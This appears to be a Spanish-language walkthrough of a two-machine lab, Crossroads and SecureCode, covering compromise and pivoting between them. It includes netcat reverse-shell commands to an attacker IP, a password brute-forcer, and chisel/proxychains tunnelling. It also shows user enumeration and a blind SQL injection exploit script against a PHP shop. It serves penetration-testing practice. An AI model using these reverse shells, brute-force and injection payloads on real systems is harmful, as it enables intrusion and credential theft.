Así que vamos a realizar un análisis con Ghidra.

Pero no encuentro mucho, parece que ejecuta un binario en el escritorio de root, por tanto, mucho no se puede analizar.

Vamos a acceder nuevamente a la carpeta de smbshare.

smbclient --password=bradley1 -U "albert" \\\\192.168.0.26\\smbshare
smb: \>

Si investigamos sobre los “magic scripts“, vemos que, si los ponemos en la carpeta compartida que corresponde con el nombre, se ejecutan.

Por tanto, voy a crear el archivo smbscript.sh con el contenido de una reverse shell y subirlo a la máquina.

nc 192.168.0.9 4444 -e /bin/bash

nc -nlvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Ncat: Connection from 192.168.0.26.
Ncat: Connection from 192.168.0.26:45790.
whoami
albert

Tenemos acceso como albert; ahora toca escalar privilegios.

Escalada de Privilegios - Crossroads

python -c 'import pty;pty.spawn("/bin/bash")'
albert@crossroads:/home/albert/smbshare$

albert@crossroads:/home/albert$ ./beroot

enter password for root
-----------------------

password:

Veo que nos pide una contraseña; este es el script que se está ejecutando en /root.

Como no tengo acceso al directorio /root, no puedo descargar el binario para analizarlo.

Luego de revisar nuevamente lo que la herramienta StegoVeritas pudo obtener de la imagen.

Veo que hay un archivo que es un diccionario.

file ./*                   
./1754610042.1145957-3161a755130490eac2f7cc43f23494c7: MPEG ADTS, layer III, v1, 80 kbps, Monaural
./1754610110.05314-6f3ed02dad7e2f978584cfdf66dbbf51:   PNG image data, 1106 x 876, 8-bit/color RGB, non-interlaced
./1854610042.114s957-3161a756330490eac297cc43f23494c7: Unicode text, UTF-8 text
./69F:                                                 empty
./69F.zlib:                                            zlib compressed data

En este caso, el 1854610042.114s957-3161a756330490eac297cc43f23494c7.

Por tanto, quizás esté ahí la contraseña; para no probar uno a uno, podríamos automatizar el proceso.

import subprocess
import sys


with open("dic.txt","r",encoding='ISO.8859.1') as fs:
    var= fs.read().splitlines()
for li in var:
    var1= li
    result= subprocess.getoutput("echo %s | ./beroot"%var1)
    print("testing password "+ var1)
    if "wrong password!!!" not in str(result):
        print(result)
        print("the password is: "+ var1)
        sys.exit(0)

Con esto debemos renombrar el diccionario a “dic.txt“ y luego subirlo a la máquina junto con el exploit.py.

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

albert@crossroads:/home/albert$ wget http://192.168.0.9/dic.txt
albert@crossroads:/home/albert$ wget http://192.168.0.9/exploit.py

Luego de tener los dos archivos, ejecutamos el exploit.py.

albert@crossroads:/home/albert$p python3 exploit.py
testing password twenty
testing password tommie
testing password sandman
testing password panchito
testing password nicole3
testing password munchie
testing password marcella
testing password lemuel
TERM environment variable not set.
enter password for root
-----------------------

do ls and find root creds
the password is: lemuel

Parece ser que la contraseña es lemuel, nos dice que hagamos un ls.

ls
beroot    crossroads.png    dic.txt  exploit.py  rootcreds    smbshare  user.txt

Vemos un nuevo archivo llamado rootcreds.

albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___

Parece que la contraseña de root es ___drifting___. Vamos a comprobarlo.

su root
Password: ___drifting___

root@crossroads:/home/albert# whoami
root

Y terminamos la primera máquina.

Comentarios - Crossroads.

La máquina no estuvo mal; practiqué temas de esteganografía y cómo obtener info en lugares ocultos.

Después, muy curioso el tema de “magic script” y el resto ya fue fuerza bruta.

Continuamos - SecureCode

Debido a que tenemos una forma sencilla de ganar acceso (al tener la contraseña de root).

Simplemente voy a enviarme una consola y recibirla con pwncat, para trabajar más cómodamente.

pwncat-cs :4446

albert@crossroads:/home/albert$ nc 192.168.0.9 4445 -e /bin/bash

(remote) root@crossroads:/root# ls
beroot.sh  creds  passwd  root.txt

Luego de vulnerar la máquina Crossroads, vamos a revisar sus interfaces de red.

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:3d:a1:bc brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.26/24 brd 192.168.0.255 scope global dynamic enp0s3
       valid_lft 3553sec preferred_lft 3553sec
    inet6 ::a00:27ff:fe3d:a1bc/64 scope global dynamic mngtmpaddr 
       valid_lft 3598sec preferred_lft 3598sec
    inet6 fe80::a00:27ff:fe3d:a1bc/64 scope link 
       valid_lft forever preferred_lft forever
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:af:1f:d2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.10/24 brd 192.168.100.255 scope global enp0s8
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:feaf:1fd2/64 scope link 
       valid_lft forever preferred_lft forever

Vemos que existe otra interfaz de red, la enp0s8.

Aquí es donde empieza la segunda parte del laboratorio y toca vulnerar la segunda máquina.

Creando Puente Crossroads - Securecode

Como directamente no podemos acceder a la segunda máquina del laboratorio (Securecode).

Vamos a utilizar como intermediario a Crossroads, que sí tiene conexión con la máquina Securecode.

Primero vamos a realizar un escaneo de la red con ping. Con un script básico en bash.

Podemos pasar también un compilado de Nmap, entre otras formas, para descubrir más hosts en la red 192.168.100.0.

#!/bin/bash

trap ctrl_c INT

function ctrl_c(){
    echo -e "\n\n[!] Saliendo...\n"
    exit 0
}

for i in $(seq 1 254); do
    (timeout 1 ping -c 1 192.168.100.$i) &>/dev/null && echo "[+] Active: 192.168.100.$i "
done

Luego le damos permisos de ejecución y lo ejecutamos (luego de pasar el archivo a la máquina).

./scan.sh 
[+] Active: 192.168.100.10 
[+] Active: 192.168.100.20 
^C

[!] Saliendo...

Como vemos, hay otra máquina en la 192.168.100.20, a la cual no tenemos acceso directamente.

Para crear el túnel, vamos a usar → chisel. Una herramienta diseñada para crear túneles UDP/TCP.

Primero nos descargamos el repositorio para luego compilarlo y, luego, lo subimos a la máquina.

git clone https://github.com/jpillora/chisel.git
cd chisel
go build .
ls
chisel  client  example  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  server  share  test

Ahí tenemos el chisel; yo, como estoy usando pwncat, simplemente tengo que usar upload y el nombre del archivo, pero hay muchas formas de transferir archivos de una máquina a la otra.

En el caso de que el binario sea muy pesado, pueden usar UPX para reducir su peso.

/root# ls
beroot.sh  chisel  creds  passwd  root.txt  scan.sh

Una vez que tenemos el chisel en la máquina víctima, necesitamos ejecutar el binario como servidor en la máquina víctima (Crossroads) y como cliente en nuestra máquina de atacante.

./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel

Vemos un error de GLIBC_2.32; en caso de que le suceda lo mismo, pueden descargarse un release del binario ya compilado de GitHub más antiguo y debería funcionar.

./chisel server -v -p 1234 --socks5
2025/08/09 09:12:20 server: Fingerprint IN40VRFPzeDz/mMmFU6rt7CKMN6Nu5/5Bao4YX0UKvE=
2025/08/09 09:12:20 server: Listening on http://0.0.0.0:1234

En este caso, yo voy a jugar con SOCKS5 para luego, con proxychains, acceder a la otra máquina, a la que en primera instancia no tengo acceso.

./chisel64 client -v 192.168.0.26:1234 socks
2025/08/09 07:18:32 client: Connecting to ws://192.168.0.9:1234
2025/08/09 07:18:32 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2025/08/09 07:18:32 client: tun: Bound proxies
2025/08/09 07:18:32 client: Handshaking...
2025/08/09 07:18:32 client: Sending config
2025/08/09 07:18:32 client: Connected (Latency 4.188901ms)
2025/08/09 07:18:32 client: tun: SSH connected

Y ahí ya funciona, con el binario antiguo.

./chisel server -v -p 1234 --socks5
2025/08/09 09:12:20 server: Fingerprint IN40VRFPzeDz/mMmFU6rt7CKMN6Nu5/5Bao4YX0UKvE=
2025/08/09 09:12:20 server: Listening on http://0.0.0.0:1234
2025/08/09 09:18:32 server: session#1: Handshaking with 192.168.0.26:45436...
2025/08/09 09:18:32 server: session#1: Verifying configuration
2025/08/09 09:18:32 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/09 09:18:32 server: session#1: tun: Created (SOCKS enabled)
2025/08/09 09:18:32 server: session#1: tun: SSH connected

Como vemos, se crea un túnel en nuestra máquina por el puerto 1080.

lsof -i:1080
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
chisel  13150 root    3u  IPv4  36500      0t0  TCP localhost:socks (LISTEN)

Por tanto, con proxychains vamos a redirigir todo el tráfico por ese puerto y con eso tendríamos acceso a la otra máquina.

tail -f /etc/proxychains.conf 
#           http    192.168.39.93    8080
#
#
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
socks4    127.0.0.1   1080

Como ven, yo tengo configurado SOCKS4; eso hay que cambiarlo a SOCKS5.

tail -f /etc/proxychains.conf
#
#
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
#socks4    127.0.0.1   1080
socks5 127.0.0.1 1080

Ahora podemos comprobar si tenemos acceso a la máquina 192.168.100.20 (Securcode 2).

proxychains curl -I 192.168.100.20
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.20:80  ...  OK
HTTP/1.1 200 OK
Date: Sat, 09 Aug 2025 09:35:40 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8

Ahora, cada vez que pasemos por el proxychains, tendremos acceso a la máquina 192.168.100.20 (Securecode).

Reconocimiento - Securecode

Para empezar, vamos a crearnos nuestros directorios de trabajo.

mkdir Securecode2      
cd Securecode2 
mkdir nmap content exploit
cd nmap

Vamos a empezar con el escaneo de puertos con nmap; para ello vamos a necesitar utilizar el parámetro -sT (TCP connect scan) en lugar del -sS (TCP SYN scan).

Esto debido a que estamos utilizando proxychains.

Esto puede ir más o menos lento (debido a que los paquetes viajan por el túnel); por tanto, mejor vamos a crear un simple script en bash para detectar los puertos abiertos.

#!/bin/bash

trap ctrl_c INT

function ctrl_c(){
    echo -e "\n\n[!]Saliendo ...\n"
    exit 1
}

for i in $(seq 1 65535); do
    echo '' > /dev/tcp/192.168.100.20/$i && echo "[+] Puerto $i - Abierto"
done

También podemos subir un compilado de Nmap a la máquina víctima para hacer el reconocimiento de puertos.

Ahora subimos el archivo de bash a la máquina víctima y lo ejecutamos.

./portscan.sh 2>/dev/null
[+] Puerto 80 - Abierto

Parece que solo tiene el puerto 80 abierto; vamos a ver qué tecnologías usa con WhatWeb.

proxychains whatweb 192.168.100.20                         
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
[proxychains] DLL init: proxychains-ng 
[proxychains] DLL init: proxychains-ng 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.20:80  ...  OK
http://192.168.100.20 [200 OK] Apache[2.4.29], Bootstrap, Country[RESERVED][ZZ], Email[ex@abc.xyz], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[192.168.100.20], JQuery[3.2.1], Script, Title[Coming Soon 2]

Vemos un Apache, la versión y Ubuntu y poco más.

Para ver la web desde nuestro navegador, hay que pasar por el proxychains; esto lo podemos hacer con un addon; yo, como uso Firefox, voy a utilizar FoxyProxy.

Simplemente descargan el addon y luego lo abren, luego le dan proxy y agregar.

Definen el nombre, el tipo socks5, el host, que es el localhost, y el puerto, en este caso 1080.

Luego, en la sección de addons, cuando seleccionen FoxyProxy, verán el nuevo y lo seleccionan.

Ahora, cuando pongan la IP de la máquina (Securecode), verán la web.

Se ve una cuenta regresiva; la página parece que está en desarrollo.

Buscando manualmente por rutas comunes, me encuentro que tiene el robots.txt y que existe un supuesto /login. Vamos a ver.

Y parece ser un panel de inicio de sesión; está en .php; importante tenerlo en cuenta.

Vemos una zona que dice Forgot Your Password?, que muestra lo siguiente.

Esto es peligroso, ya que podríamos intentar enumerar usuarios válidos.

Y sí tenemos posibilidad de enumerar usuarios, y sabemos que el usuario admin existe.

Si hacemos Ctrl+Shift+C, y nos vamos a Network y colocamos un usuario que no existe, podemos ver cómo se tramita la petición.

Vemos que viaja por POST a resetPassword.php y como POST data envía username=<usuario>.

Con esto podemos hacer un ataque de fuerza bruta para enumerar más usuarios en el caso de que existan.

Antes de nada, vamos a realizar fuzzing con Wfuzz, para no ir tan rápido y no saturar el túnel.

proxychains wfuzz --hc 404 -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://192.168.100.20/FUZZ 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.20/FUZZ
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                              
=====================================================================

000000001:   200        102 L    251 W      3650 Ch     "# directory-list-2.3-medium.txt"                    
000000007:   200        102 L    251 W      3650 Ch     "# license, visit http://creativecommons.org/licenses
                                                        /by-sa/3.0/"                                         
000000003:   200        102 L    251 W      3650 Ch     "# Copyright 2007 James Fisher"                      
000000014:   200        102 L    251 W      3650 Ch     "http://192.168.100.20/"                             
000000012:   200        102 L    251 W      3650 Ch     "# on at least 2 different hosts"                    
000000006:   200        102 L    251 W      3650 Ch     "# Attribution-Share Alike 3.0 License. To view a cop
                                                        y of this"                                           
000000008:   200        102 L    251 W      3650 Ch     "# or send a letter to Creative Commons, 171 Second S
                                                        treet,"                                              
000000009:   200        102 L    251 W      3650 Ch     "# Suite 300, San Francisco, California, 94105, USA."
000000010:   200        102 L    251 W      3650 Ch     "#"                                                  
000000005:   200        102 L    251 W      3650 Ch     "# This work is licensed under the Creative Commons" 
000000011:   200        102 L    251 W      3650 Ch     "# Priority ordered case-sensitive list, where entrie
                                                        s were found"                                        
000000013:   200        102 L    251 W      3650 Ch     "#"                                                  
000000002:   200        102 L    251 W      3650 Ch     "#"                                                  
000000004:   200        102 L    251 W      3650 Ch     "#"                                                  
000000053:   301        9 L      28 W       316 Ch      "login"                                              
000000086:   301        9 L      28 W       318 Ch      "profile"                                            
000000202:   301        9 L      28 W       316 Ch      "users"                                              
000000694:   301        9 L      28 W       315 Ch      "item"                                               
000001112:   301        9 L      28 W       318 Ch      "include"

Vemos un par de recursos, pero nos pide iniciar sesión primero.

Vamos a buscar archivos con extensión .php.

Pero no encuentra nada. Con la misma técnica que vimos, como se tramitan los datos a resetPassword.php, podemos ver cómo se tramitan los datos hacia login.php.

Esto con el fin de hacer fuerza bruta y ver si encontramos la contraseña de admin. Que sabemos que existe.

Vemos que se envían a checkLogin.php como username=<username>&password=<password>.

Pero no encuentra nada.

Para analizar las cosas con Burp Suite, hay que habilitar la configuración en el Burp Suite de SOCKS.

Luego de irnos a Settings en proxy, nos vamos a Network → Connections y veremos el SOCKS proxy.

Donde, luego de configurarlo por el puerto 1080 por el localhost, ya funcionará el Burp Suite.

Luego de una pequeña enumeración de usuarios, encuentro otro.

wfuzz -c -p 127.0.0.1:1080:SOCKS5 -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.100.20/login/resetPassword.php -d "username=FUZZ" 2>/dev/null -L --hw 88 
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.20/login/resetPassword.php
Total requests: 8295455

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                              
=====================================================================

000000002:   200        53 L     113 W      2323 Ch     "admin"                                              
000003766:   200        53 L     113 W      2323 Ch     "customer"

En este caso utilizamos el parámetro -p de wfuzz para pasar por el túnel. Vemos al usuario customer.

Después de enumerar un largo rato, decido probar extensiones comunes hasta que me encuentro con lo siguiente.

wfuzz --hc 404 -p 127.0.0.1:1080:SOCKS5 -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.100.20/FUZZ.zip
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.20/FUZZ.zip
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                              
=====================================================================

000000001:   200        102 L    251 W      3650 Ch     "# directory-list-2.3-medium.txt"                    
000000007:   200        102 L    251 W      3650 Ch     "# license, visit http://creativecommons.org/licenses
                                                        /by-sa/3.0/"                                         
000000003:   200        102 L    251 W      3650 Ch     "# Copyright 2007 James Fisher"                      
000000006:   200        102 L    251 W      3650 Ch     "# Attribution-Share Alike 3.0 License. To view a cop
                                                        y of this"                                           
000000004:   200        102 L    251 W      3650 Ch     "#"                                                  
000000005:   200        102 L    251 W      3650 Ch     "# This work is licensed under the Creative Commons" 
000000002:   200        102 L    251 W      3650 Ch     "#"                                                  
000000008:   200        102 L    251 W      3650 Ch     "# or send a letter to Creative Commons, 171 Second S
                                                        treet,"                                              
000000013:   200        102 L    251 W      3650 Ch     "#"                                                  
000000012:   200        102 L    251 W      3650 Ch     "# on at least 2 different hosts"                    
000000009:   200        102 L    251 W      3650 Ch     "# Suite 300, San Francisco, California, 94105, USA."
000000011:   200        102 L    251 W      3650 Ch     "# Priority ordered case-sensitive list, where entrie
                                                        s were found"                                        
000000010:   200        102 L    251 W      3650 Ch     "#"                                                  
000058434:   200        19782    194583 W   4996685 C   "source_code"

Vemos que existe un source_code.zip.

Vamos a descargarlo para ver qué contiene.

proxychains wget http://192.168.100.20/source_code.zip
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
--2025-08-09 19:35:39--  http://192.168.100.20/source_code.zip
Connecting to 192.168.100.20:80... [proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.20:80  ...  OK
connected.
HTTP request sent, awaiting response... 200 OK
Length: 5275298 (5.0M) [application/zip]
Saving to: ‘source_code.zip’

source_code.zip               100%[===============================================>]   5.03M  5.53MB/s    in 0.9s    

2025-08-09 19:35:40 (5.53 MB/s) - ‘source_code.zip’ saved [5275298/5275298]

7z x source_code.zip
ls
asset  db.sql  include  index.php  item  login  profile  robots.txt  source_code.zip  users

Vemos un db.sql; vamos a ver su contenido.

cat db.sql

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+02:00";


CREATE TABLE `item` (
  `id` int(5) NOT NULL,
  `id_user` int(5) NOT NULL,
  `name` varchar(50) NOT NULL,
  `description` varchar(250) NOT NULL,
  `imgname` varchar(250) NOT NULL,
  `price` int(10) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;


INSERT INTO `item` (`id`, `id_user`, `name`, `description`, `imgname`, `price`) VALUES
(1, 1, 'Raspery Pi 4', 'Latest Raspberry Pi 4 Model B with 2/4/8GB RAM raspberry pi 4 BCM2711 Quad core Cortex-A72 ARM v8 1.5GHz Speeder Than Pi 3B', '1.png', 92),
(2, 1, 'ALFA WIFI Adapter', 'ALFA WIFI Adapter', '2.png', 12),
(3, 1, 'Mask', 'Mask', '3.jpg', 22),
(4, 1, 'T-Shirt', 'Anonymous Quote T Shirt Fake Society Funny Hacker Parody Guy Fawkes Unisex Tee Style Round Tee Shirt', '4.jpg', 7);


CREATE TABLE `level` (
  `id` int(5) NOT NULL,
  `name` varchar(10) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;


INSERT INTO `level` (`id`, `name`) VALUES
(1, 'admin'),
(2, 'user');


CREATE TABLE `user` (
  `id` int(5) NOT NULL,
  `username` varchar(50) NOT NULL,
  `password` varchar(50) NOT NULL,
  `email` varchar(100) NOT NULL,
  `gender` varchar(10) NOT NULL,
  `id_level` int(5) NOT NULL,
  `token` varchar(50) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;


INSERT INTO `user` (`id`, `username`, `password`, `email`, `gender`, `id_level`, `token`) VALUES
(1, 'admin', '24b97b1ec42a3deace58636148135f7d', 'admin@hackshop.com', 'Male', 1, ''),
(2, 'customer', '355509442720e7eaa27d4e2fc8abe95a', 'customer@hackshop.com', 'Female', 2, '');


ALTER TABLE `item`
  ADD PRIMARY KEY (`id`),
  ADD KEY `id_user` (`id_user`);


ALTER TABLE `level`
  ADD PRIMARY KEY (`id`);


ALTER TABLE `user`
  ADD PRIMARY KEY (`id`),
  ADD KEY `id_level` (`id_level`);


ALTER TABLE `item`
  MODIFY `id` int(5) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;


ALTER TABLE `user`
  MODIFY `id` int(5) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;


ALTER TABLE `item`
  ADD CONSTRAINT `item_ibfk_1` FOREIGN KEY (`id_user`) REFERENCES `user` (`id`) ON DELETE CASCADE ON UPDATE CASCADE;


ALTER TABLE `user`
  ADD CONSTRAINT `user_ibfk_1` FOREIGN KEY (`id_level`) REFERENCES `level` (`id`) ON DELETE CASCADE ON UPDATE CASCADE;
COMMIT;

Vamos los dos usuarios que descubrimos con sus emails y sus contraseñas.

Vamos a revisar el resto de archivos si encontramos cosas interesantes.

Revisando los archivos .php, me encuentro info interesante revisando el resetPassword.php.

<?php }


function generateToken(){
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < 15; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

function send_email($username, $token){

    $message = "Hello ".htmlentities($username).",\n";
    $message .= "Please follow the link below to reset your password: \n";
    $message .= "http://".gethostname()."/doResetPassword.php?token=$token \n";
    $message .= "Thanks.\n";

    // get user email
    $data = mysqli_query($conn, "SELECT * FROM user WHERE username='$username'");
    while($result= mysqli_fetch_array($data)){
        $email = $result['email'];
    }
    @mail($email, "Reset Your Password", $message);

}

?>

Esta es la parte importante; vemos dos funciones, una generateToken() y send_mail().

Al parecer, el token que nos envían por correo se calcula dentro del mismo resetPassword.php y en send_mail() vemos cómo se tramita la petición y a dónde, en este caso doResetPassword.php.

Si miramos el doResetPassword.php, encontramos lo siguiente:

cat doResetPassword.php

<?php

include "../include/header.php";

$p_token = $_GET['token'];

$data = mysqli_query($conn, "SELECT * FROM user");
$tokens = [];
while($result = mysqli_fetch_array($data)){
    array_push($tokens, $result['token']);
}

if(ctype_alnum($p_token) AND in_array($p_token, $tokens)){

?>

<div class="container">
        <br><br><br><br><br>
        <div class="alert alert-success  fade in">    
            <strong>Success! </strong> Valid Token Provided, you can change your password below <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                <span aria-hidden="true">×</span>
            </button>
        </div>
        <div class="col-md-3">

        </div>
            <form action="doChangePassword.php" method="POST" class="form-horizontal col-md-6">
                <div class="panel panel-primary">
                    <div class="panel-heading">
                        <center>Change Your Password</center>
                    </div>
                    <div class="panel-body">
                        <input type="hidden" name="token" value="<?php echo htmlentities($p_token); ?>">
                        <div class="form-group">
                            <label class="control-label col-sm-2" for="password">New Password</label>
                            <div class="col-sm-10">
                                <input type="password" name="password" class="form-control" id="password" placeholder="Enter password">
                            </div>

                        </div>
                        <input type="submit" value="Change Password" class="btn btn-primary">
                    </div>
                </div>
            </form>
        <div class="col-md-3">

        </div>
    </div>

<?php 

}

Si miramos el último archivo que nos falta, que es el de doChangePassword.php, vemos lo siguiente:

cat doChangePassword.php

<?php

include "../include/header.php";

$p_token = mysqli_real_escape_string($conn, $_REQUEST['token']);
$password = mysqli_real_escape_string($conn, $_REQUEST['password']);

if(isset($p_token, $password) and ctype_alnum($p_token) and $password !== ''){

    $data = mysqli_query($conn, "SELECT * FROM user");
    $tokens = [];
    while($result = mysqli_fetch_array($data)){

        array_push($tokens, $result['token']);

    }

    if(in_array($p_token, $tokens)){

        $hash = md5($password);
        $x = mysqli_query($conn, "UPDATE user SET password = '$hash' WHERE token = '$p_token'");
        $y = mysqli_query($conn, "UPDATE user SET token = '' WHERE token = '$p_token'");

        if($x and $y){
            $_SESSION['status']=" Password Changed";
        }else{
            $_SESSION['danger']=" Failed to change password";
        }

        header("Location: login.php");
        die();

    }else{

        $_SESSION['danger'] = " Invalid password reset link.";
        header("Location: ../login/resetPassword.php");
        die();

    }

}else{

    $_SESSION['danger'] = " Invalid Token Provided.";
    header("Location: login.php");

}

?>

Ahí vemos que hace la comparativa del token y luego limpia el token en caso de existir en la base de datos y luego cambia la contraseña por la nueva.

Revisando el código, veo que la mayoría de peticiones utiliza la siguiente función de MySQL: mysqli_real_escape_string. Esto lo que hace es escapar ciertos caracteres que pueden utilizarse para realizar un SQLI.

Pero revisando veo que en la carpeta item el viewItem.php lo utiliza, pero hay un error.

cat viewItem.php

<?php

// Still under development
session_start();
ini_set("display_errors", 0);
include "../include/connection.php";

// see if user is authenticated, if not then redirect to login page
if($_SESSION['id_level'] != 1){

    $_SESSION['danger'] = " You not have access to visit that page";
    header("Location: ../login/login.php");

}
// only for users with level 1 (admins)
// prevent SQL injection
$id = mysqli_real_escape_string($conn, $_GET['id']);
$data = mysqli_query($conn, "SELECT * FROM item WHERE id = $id");
$result = mysqli_fetch_array($data);

//var_dump($result);
if(isset($result['id'])){
    http_response_code(404);
}


?>

Como se puede ver, es verdad que se utiliza mysqli_real_escape_string en el $id, pero a la hora de realizar la query, no utiliza comillas o comillas simples. $data = mysqli_query($conn, "SELECT * FROM item WHERE id = $id");

Entonces nosotros podemos inyectar queries evitando utilizar comillas o comillas simples, pero concatenando otra query, debido a que podemos manipular el input.

Debido a que sabemos la estructura, gracias a este backup, es más sencillo crear un script para ir enumerando la base de datos.

proxychains curl -I "http://192.168.100.20/item/viewItem.php" -G --data-urlencode "id=5 or (select(select ascii(substring(username,1,1)) from user where id_level = 1)=97);"

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.20:80  ...  OK
HTTP/1.1 404 Not Found
Date: Sun, 10 Aug 2025 19:58:51 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=bh5v9n39i3v0amr63p5842inkq; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../login/login.php
Content-Type: text/html; charset=UTF-8

proxychains curl -I "http://192.168.100.20/item/viewItem.php" -G --data-urlencode "id=5 or (select(select ascii(substring(username,1,1)) from user where id_level = 1)=98);"

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.20:80  ...  OK
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2025 19:58:54 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=3u8m9l0sgn4g3g9v23jhkbmjtb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../login/login.php
Content-Type: text/html; charset=UTF-8

Esto es un pequeño ejemplo, id=5 or (select(select ascii(substring(username,1,1)) from user where id_level = 1)=98);, en esta parte, enviamos un id 5, y con or agregamos otra query.

Debido a que no podemos usar comillas, utilizamos ASCII, que nos permite representar los caracteres en formato ASCII; en este caso nos apoyamos en el id_level, ya que sabemos que existen dos usuarios, y el primero es admin.

Debido a que en ASCII la “a” minúscula es 97. Al igualarlo a 98, la respuesta es un código redirect (302), pero al igualarlo a 97, es un código de error (404).

Gracias a este concepto, podemos crear un script que nos enumere la base de datos.4

#!/usr/bin/python3

from pwn import *

import requests, signal, sys, string


def def_handler(sig, frame):
    print("\n\n[!] Saliendo ...\n")
    sys.exit(1)

# Ctrl+c

signal.signal(signal.SIGINT, def_handler)

# Var globales

proxies = {
        'http': f'socks5://127.0.0.1:1080'
}
main_url = "http://192.168.100.20/item/viewItem.php"

characters = string.ascii_lowercase

def makeSqli():

    p1 = log.progress("Fuerza Bruta")
    p1.status("Iniciando ataque de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("Username")

    username =  ""

    for position in range(1,50):
        for character in characters:

            sqliURL = main_url + "?id=5 or (select(select ascii(substring(username,%d,1)) from user where id_level = 1)=%d);" % (position, ord(character))

            r = requests.get(sqliURL, proxies=proxies)

            if r.status_code == 404:
                username += character
                p2.status(username)
                break

if __name__ == '__main__':

    makeSqli()

Tenemos que definir el proxy también a la hora de tramitar la petición; de lo contrario, no podremos llegar a la máquina SecureCode.

python3 exploit.py
[┴] Fuerza Bruta: Iniciando ataque de fuerza bruta
[O] Username: admin
^C

[!] Saliendo ...

Para enumerar la contraseña, simplemente cambiamos los campos de username en el script por password.

python3 exploit.py
[ ] Fuerza Bruta: Iniciando ataque de fuerza bruta
[◣] password: unaccessableuntilyouchangeme
^C

[!] Saliendo ...

Bueno, vemos la contraseña de admin; vamos a probarla para ver si funciona.

Vemos que no nos deja, nos está diciendo que no podemos acceder hasta que cambiemos la contraseña, unaccessableuntilyouchangeme, debido a que conocemos la estructura de la web y la base de datos.

